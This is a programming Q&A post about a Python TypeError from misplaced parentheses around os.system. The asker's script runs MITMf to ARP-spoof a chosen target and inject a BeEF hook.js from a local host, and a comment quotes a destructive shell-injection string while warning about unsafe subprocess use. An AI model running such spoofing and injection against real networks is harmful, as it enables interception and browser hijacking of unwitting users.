# TypeError: unsupported operand type(s) for %: 'int' and 'tuple' when executing a command with python

Tags: python

My Code is

```
#! /usr/bin/env python
ip_addr = raw_input('Enter your target: ')
gateway = raw_input('Enter your gateway: ')
import os
os.chdir('/usr/share/mitmf/')
os.system ('python mitmf.py --spoof --arp -i wlan0 --gateway %s --target %s --inject --js-url http://192.168.1.109:3000/hook.js') % (gateway, ip_addr)
```

and my output is :

```
  File "./ARP_Beef.py", line 6, in <module>
    os.system ('python mitmf.py --spoof --arp -i wlan0 --gateway %s --target %s --inject --js-url http://192.168.1.109:3000/hook.js') % (gateway, ip_addr)
  TypeError: unsupported operand type(s) for %: 'int' and 'tuple'
```

I'm very new to python and was hoping someone could help me out.

Answer (score 4, accepted):

You have a problem with your parentheses:

```
os.system("....") % (gateway, ip_addr)
```

With this code, Python first runs `os.system`, which returns an int, and then it tries
to call the `%` operator with the `(gateway, ip_addr)` tuple

You probably mean something like:

```
os.system("...." % (gateway, ip_addr))
```

By the way, I suggest two improvements to your code:

1. Use `sys.executable` instead of hard-coding "python" : this way you are sure to use the same python version as the one currently running your script
2. Prefer using subprocess over os.system

Comment: In particular, you want to use `subprocess` (in `list` form, with the default `shell=False` behavior) because you're passing user provided strings to the subprocess. If someone passes `; rm -rf /usr #` as a command, well, better hope the script wasn't running with sufficient privileges to blow away `/usr`. Even if they aren't being actively malicious, shell metacharacters show up in legitimate names, and escaping properly is a pain. The `list` form of something like `subprocess.call` is roughly as easy, and avoids the overhead and security/stability issues of executing strings in a shell.